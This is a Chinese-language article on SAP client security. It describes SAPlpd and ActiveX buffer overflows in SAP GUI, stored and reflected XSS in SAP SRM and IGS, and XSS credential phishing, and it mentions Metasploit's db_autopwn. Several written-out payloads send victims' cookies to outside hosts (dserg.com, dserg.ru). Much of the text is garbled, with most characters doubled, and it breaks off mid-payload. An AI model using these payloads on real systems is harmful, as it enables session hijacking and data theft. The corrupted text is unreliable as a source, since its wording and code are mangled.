SAP客戶端安全性

1、在復(fù)雜的信息安全處理過程中，最重要的任務(wù)之一就是業(yè)務(wù)應(yīng)用軟件的安全性。如今，SAP平臺 是用得最為廣泛的管理企業(yè)系統(tǒng)和存儲最重要的數(shù)據(jù)的平臺。遺憾的是，人們對于SAP的安全性關(guān)注卻仍顯不足。實際上，在SAP系統(tǒng)的各種級別上還有許多問 題，如網(wǎng)絡(luò)級、業(yè)務(wù)系統(tǒng)級別、數(shù)據(jù)庫級別、應(yīng)用程序級別和表示級即SAP客戶端。關(guān)于SAP服務(wù)器安全性的文獻，流傳較多，但是有關(guān)SAP客戶端安全性的 介紹，卻比較少見。實際上，即使SAP服務(wù)器環(huán)境是安全的，只要SAP客戶端出現(xiàn)紕漏，那么根據(jù)木桶原理，整個系統(tǒng)的安全性就會潰于蟻穴。在本文中，我們要討論的就是SAP客戶端的安全性問題。SAP客戶端不僅可能從企業(yè)網(wǎng)絡(luò)發(fā)動攻擊

2、，而且還可能從有權(quán)訪問SAP服務(wù)器和關(guān)鍵業(yè)務(wù)數(shù)據(jù)的企業(yè)網(wǎng)絡(luò)和用戶工作站的公共網(wǎng)絡(luò)發(fā)動攻擊。利用溢出漏洞攻擊SAP客戶端SAP GUII是一個標(biāo)準(zhǔn)準(zhǔn)的應(yīng)用程序序，它用來連連接SAP并并使用有關(guān)數(shù)數(shù)據(jù)。在采用用了SAP的的大型公司中中，幾乎所有有的SAP客客戶端工作站站上都安裝了了這個應(yīng)用程程序。就像其它具有復(fù)復(fù)雜結(jié)構(gòu)的應(yīng)應(yīng)用程序一樣樣，這個應(yīng)用用程序也存在在許多漏洞。鑒鑒于這個應(yīng)用用程序的流行行性，在SAAPGUI中中發(fā)現(xiàn)的漏洞洞的嚴(yán)重性堪堪比IE瀏覽覽器 或者MMicrossoft oofficee軟件中的溢溢出漏洞。WWindowws基本設(shè)施施在更新方面面還是比較方方便的，同時時管理員還會會

3、收到嚴(yán)重WWindowws漏洞的通通知，但是SSAP客戶端端的 情況就就不同了。SSAP客戶端端的安全問題題主要有兩個個，一是客戶戶端軟件沒有有自動更新系系統(tǒng)，二是在在現(xiàn)有的問題題和解決方法法方面的信息息還比較匱乏乏?？紤]到SAP系系統(tǒng)是通過瀏瀏覽器來訪問問的，所以在在SAP WWeb服務(wù)器器中存在的XXSS安全漏漏洞可能導(dǎo)致致針對SAPP客戶端的各各種攻擊，并并提高了攻擊擊SAP客戶戶端的可能性性。去年初，安全專專家已經(jīng)在SSAPlpdd和SAPspprint組組件中發(fā)現(xiàn)了了一些緩沖區(qū)區(qū)溢出漏洞。組組件SAPllpd是安裝裝在每個SAAP用戶工作作站上的客戶戶 應(yīng)用程序序SAP GGUI的一

4、部部分，運行在在515端口口上提供打印印服務(wù)。人們們在SAPllpd所使用用的協(xié)議中已已經(jīng)發(fā)現(xiàn)了許許多漏洞，這這些漏洞允許許攻擊者遠程程控制有弱點點的系統(tǒng)，執(zhí)執(zhí)行 拒絕服服務(wù)攻擊，或或者停止打印印服務(wù)。這些些漏洞的詳細細情況可以從從SAP的正正式報告中找找到。主要特特點是，有弱弱點的服務(wù)端端口默認時是是關(guān)閉的，只只有當(dāng)用戶打打印下一個 文檔時才打打開。乍一看這個特特點提高了攻攻擊用戶工作作站的難度，事事實上絕非如如此?？紤]到采用SAAP的公司，一一般SAP用用戶的數(shù)量都都是數(shù)以百計計的，甚至數(shù)數(shù)以千計，所所以在給定時時刻有人打印印文檔的可能能性是非常大大的。因此，可可以編寫一個個腳本來掃描描網(wǎng)

5、絡(luò)，尋找找開放的端口口，并在檢測測到開放端口口時啟動漏洞洞利用代碼來來迅速得到有有弱點的用戶戶的工作站的的管理訪問權(quán)權(quán)限。這不僅是一個理理論設(shè)想而已已，實際上做做起來也很簡簡單。針對特特定安全漏洞洞的漏洞利用用代碼已經(jīng)添添加到了Meetasplloit框架架中了，而 Metassploitt是可以從互互聯(lián)網(wǎng)免費下下載的。攻擊擊者需要做的的，只是選擇擇一個將在客客戶端上使用用的shelll-codde，然后使使用db_aautopwwn模 塊添添加一列客戶戶工作站的IIP地址就行行了。如果SSAPlpdd的版本有弱弱點，并且用用戶在此刻啟啟動了打印服服務(wù)，那么攻攻擊者就能夠夠得到對該用用戶的工作

6、站站的訪問權(quán)限限 （如下圖圖所示）。實實際上，677%的SAPPGUI安裝裝都易于受到到這種攻擊的的危害。 圖 獲取對帶有有SAPlppd安全漏洞洞的SAP客客戶端的訪問問權(quán)限得到了用戶的工工作站命令提提示符的訪問問權(quán)限后，攻攻擊者就可以以做一些更出出格的事情，例例如，可以安安裝特洛伊木木馬程序來竊竊取用戶的密密碼，或者從從sapshhortcuut.inii配置文件中中讀取用戶證證書，這樣就就可以直接訪訪問SAP服服務(wù)器和關(guān)鍵鍵業(yè)務(wù)數(shù)據(jù)了了。SAP GUII中的ActtiveX漏漏洞實際上，SAPP GUI應(yīng)應(yīng)用程序還有有許多緩沖區(qū)區(qū)溢出漏洞。我我們下面討論論SAP GGUI應(yīng)用程程序的Ac

7、ttiveX組組件中的一些些漏洞。SAAP GUII由大約10000個不同同的ActiiveX組件件構(gòu)成，而每每個ActiiveX組件件都可能存在在漏洞。為了利用這類漏漏洞，通常需需要人工介入入：用戶必須須點擊攻擊者者提供的鏈接接（這些鏈接接可以通過電電子郵件、即即時通訊工具具等等傳遞給給用戶），從從而導(dǎo)致瀏覽覽器中 的脆脆弱部件被利利用，這樣受受害者的命令令提示符的訪訪問權(quán)就落入入了攻擊者手手里了。有關(guān)關(guān)數(shù)據(jù)顯示，一一般說來會有有10%到550%的用戶戶會點擊攻擊擊者通過社交交工程發(fā)給 他們的惡意意鏈接。會導(dǎo)導(dǎo)致溢出攻擊擊的脆弱組件件將在受害者者瀏覽器所在在的上下文中中執(zhí)行，如果果受害者經(jīng)常

8、常在管理員權(quán)權(quán)限之下啟動動瀏覽器的話話，攻擊者就就獲得了相應(yīng)應(yīng)的權(quán) 限。第一個公開的SSAP GUUI中的AcctiveXX組件弱點是是在20077年發(fā)布的。同同時，在kwwedit組組件中也已經(jīng)經(jīng)發(fā)現(xiàn)了一個個安全漏洞，此此外，在kwwedit rfcguuisinkk組件中還發(fā)發(fā)現(xiàn)了另一個個安全漏洞。成成功利用這些些漏洞后，攻攻擊者就會得得到客戶系統(tǒng)統(tǒng)的遠程控制制權(quán)限。這些些漏洞已經(jīng)被被修補過了，詳詳情可以參考考 SAP的的有關(guān)通知。之之后，在其他他組件中也發(fā)發(fā)現(xiàn)了一些遠遠程溢出漏洞洞。 其中還還有一些漏洞洞仍未修補好好。2009年6月月份，又發(fā)現(xiàn)現(xiàn)了一個緩沖沖區(qū)溢出安全全漏洞。 SSapi

9、rrrfc.dlll 中的這這個安全漏洞洞與發(fā)現(xiàn)的其其他漏洞一樣樣，也可以用用來獲得對受受害者的工作作站的遠程控控制權(quán)限。要想利用這個安安全漏洞，攻攻擊者可以設(shè)設(shè)計一個HTTML頁面，用用該頁面來加加載有弱點的的ActivveX組件SSAPIrRRfc，然后后向其發(fā)送一一行大小超過過720字節(jié)節(jié)的參數(shù)來接接管它。一旦用戶點擊了了該鏈接，那那么就會引起起針對用戶的的工作站的拒拒絕服務(wù)攻擊擊，或者在用用戶的工作站站上執(zhí)行遠程程代碼。在這這里，您將看看到一個會導(dǎo)導(dǎo)致拒絕服務(wù)務(wù)的概念性驗驗證代碼，如如圖所示：總起來說，以下下因素增加了了該攻擊的危危險程度：1.在rfcgguisinnk、kwediit

10、和WebbVieweer3D中發(fā)發(fā)現(xiàn)的許多漏漏洞都有現(xiàn)成成的攻擊代碼碼可用，并且且許多已經(jīng)包包含在 Meetasplloit中了了。所以攻擊擊者需要做的的只是選擇一一個shelll-codde，找到用用戶電子郵件件地址，然后后向其發(fā)送含含有鏈接的電電子郵件，其其中的鏈接指指 向攻擊者者的使用了脆脆弱組件的站站點。 從而而有可能收到到大數(shù)量企業(yè)業(yè)工作站上的的shelll。2.在組件saapirrffc.dlll中發(fā)現(xiàn)的安安全漏洞已經(jīng)經(jīng)在SAP GUI 77.10版本本中得到了修修補。 但是是，對于6.2和6.44版本來說，還還沒有補丁可可用，所以建建議升級到77.1版本。 考慮到目前前6.2和6

11、6.4版本占占用戶工作站站的10%和和50%（版版本7.1的的用戶工作站站占剩下的440%），所所以大部分的的公司用戶仍仍然生活在這這些攻擊的威威脅之 下。3.除了使用郵郵件或者即時時通訊工具之之外，變通的的攻擊辦法是是，攻擊者可可以在企業(yè)文文檔流通系統(tǒng)統(tǒng)例如SAPP CFollders中中創(chuàng)建惡意的的html文文檔。 在這這種情況下，人人們對該文檔檔的信任程度度會明顯高于于郵件或者即即時通訊工具具，但是在內(nèi)內(nèi)部系統(tǒng)中上上載文檔相對對來說要更困困難一些。利用SAP WWeb應(yīng)用程程序服務(wù)器漏漏洞攻擊SAAP客戶端目前，越來越多多的SAP系系統(tǒng)通過weeb進行傳輸輸，像SAPP Enteerpr

12、isse Porrtal、SSAP SRRM 、SAAP CRMM 以及許多多其他組件等等等。 一些些程序允許通通過瀏覽器來來使用SAPP系統(tǒng)的各種種功能，并且且SAP應(yīng)用用程序看起來來跟普遍的Weeb應(yīng)用程序序沒什么兩樣樣。然而，即即使底部的SSAP平臺 NetWeeaver也也是構(gòu)建于不不同的Webb服務(wù)之上一一個應(yīng)用程序序服務(wù)器而已已。即使在無無需額外的組組件的默認配配置下，SAAP NettWeaveer也帶有若若干漏洞。盡管這些漏洞都都是在Webb服務(wù)器中發(fā)發(fā)現(xiàn)的，但是是攻擊的對象象卻是SAPP客戶端。因因此，談及SSAP客戶端端的安全時，必必須提到在WWeb應(yīng)用程程序中的典型型客戶

13、端漏洞洞。關(guān)于SAAP客戶端，我我們關(guān)心的漏漏洞有：HTML代碼注注入漏洞或者者存儲式XSSS；反射式XSS；釣魚攻擊或身份份驗證數(shù)據(jù)攔攔截；HTML代碼注注入漏洞以及及存儲式XSSS下面讓我們考察察在應(yīng)用程序序SAP SSRM（該應(yīng)應(yīng)用程序用于于遠程供應(yīng)商商）中的一個個html注注入安全漏洞洞(也稱為存存儲式XSSS)的例子。SAP SRMM系統(tǒng)允許創(chuàng)創(chuàng)建含有任何何數(shù)據(jù)的HTTML文檔，并并將該文檔放放置到采購方方的Geneeral文件件夾中。因此此，經(jīng)過身份份驗證的系統(tǒng)統(tǒng)用戶(供應(yīng)應(yīng)方）就可以以發(fā)動存 儲儲式XSS攻攻擊。 攻擊擊假設(shè)把惡意意代碼注入到到入口頁面中中。例如，通通常買方是可可

14、以訪問文檔檔交換文件夾夾的。買方萬萬一成功查看看了這個頁面面，他的會話話證書(Coookie)就會被攔 截，并轉(zhuǎn)發(fā)發(fā)給攻擊者的的站點。 作為一一個例子，可可以使用以下下HTML文文件：doccumentt.locaation.href=httpp:/dsserg.ccom/?+docuument.cookiie;由于SAP SSRM的用戶戶會話沒有綁綁定IP地址址，所以攻擊擊者可以使用用他的coookie連接接到用戶環(huán)境境，并獲得其其他供應(yīng)商的的文檔的權(quán)限限以及管理系系統(tǒng)功能的權(quán)權(quán)限。 這個個漏洞不是唯唯一的，關(guān)于于相似的漏洞洞的詳情可以以在官員通報報中找到。在在這個通報中中描述的漏洞洞允許在

15、入口口頁面里注入入任何HTMML和JavvaScriipt，從而而 獲得對其其他用戶的會會話的訪問權(quán)權(quán)限。還記得前面介紹紹的SAPGGUI AcctiveXX組件中的漏漏洞吧，如果果跟這里的漏漏洞相結(jié)合，就就會得到一種種新的攻擊形形式。這時，要要求加載HTTML頁面來來調(diào)用一個有有弱點的AcctiveXX組件。 在在這種情況下下，如果公司司的雇員打開開了我們的文文檔，那么我我們就能夠訪訪問他的工作作站了，從而而為我們進一一步攻擊企業(yè)業(yè)網(wǎng)絡(luò)打下了了基礎(chǔ)。反射式XSS就像前面提到的的那樣，甚至至在標(biāo)準(zhǔn)應(yīng)用用程序SAPP NetWWeaverr中也存在許許多的安全漏漏洞，所以更更不要說其它它的組件了

16、。據(jù)據(jù)安全研究人人員稱，在各各種SAP應(yīng)應(yīng)用程序中現(xiàn)現(xiàn)已公布了的的安全漏洞就就有20個左左右。 這只只是已經(jīng)公開開的，至于那那些尚未公之之于眾的，我我們就不得而而知了。就像前面介紹的的SAP SSRM中的安安全漏洞一樣樣，我們將考考察在另一個個應(yīng)用程序SSAP IGGS中的一些些安全漏洞。對對于這些漏洞洞，攻擊者必必須創(chuàng)建一個個鏈接，如下下所示：http:/serveer:401180/ADDM:GETTLOGFIILE?PAARAMS=dooucmennt.loccationn.hreff=htttp:/ddserg.ru/?+docuument.cookiie;然后，攻擊者必必須發(fā)給受害害

17、者并得到他他的cookkie。在標(biāo)標(biāo)準(zhǔn)SAP環(huán)環(huán)境和其它組組件中，像這這樣的安全漏漏洞還有很多多，在此不作作一一介紹。利用XSS“釣釣取”身份驗驗證數(shù)據(jù)利用XSS安全全漏洞，還有有可能利用釣釣魚攻擊來嗅嗅探用戶的身身份驗證數(shù)據(jù)據(jù)。在SAPP Web應(yīng)應(yīng)用程序服務(wù)務(wù)器中就發(fā)現(xiàn)現(xiàn)了這樣的XXSS安全漏漏洞，而SAAP Webb應(yīng)用程序服服務(wù)器則是整整個SAP系系統(tǒng)的基礎(chǔ)。之之所以出現(xiàn)這這個安全漏洞洞，是因為對對通過webb登錄到SAAP系統(tǒng)時的的URL中用用來表示標(biāo)準(zhǔn)準(zhǔn)接口的 ssap/bcc/gui/saap/itss/webggui/沒有有進行嚴(yán)格的的過濾所導(dǎo)致致的。這個XSS安全全漏洞允許在

18、在URL中注注入JavaaScrippt代碼，用用這樣的方式式，可以把用用戶和密碼輸輸入表單之后后的內(nèi)容注入入到頁面的源源代碼中。所所以， 它實實際是注入了了修改標(biāo)準(zhǔn)輸輸入字段的代代碼，并在按按下提交按鈕鈕的時候把用用戶輸入的數(shù)數(shù)據(jù)轉(zhuǎn)移到攻攻擊者控制之之下的站點上上了。 下面面是頁面的原原始代碼片段段：.HERE IS THE INPUT FORMS.HERE IS THE SUBMIT BUTTON就像看到的那樣樣，我們可以以利用注入的的代碼改寫輸輸入表單。為為了實現(xiàn)這種種攻擊，攻擊擊者必須向潛潛在的受害者者發(fā)送如下所所示的一個鏈鏈接：http:/sapseerver:8000/sap/bbe/guii/sap/its/wwebguii? XSSS codde whiich wiill ovverwriite sttandarrd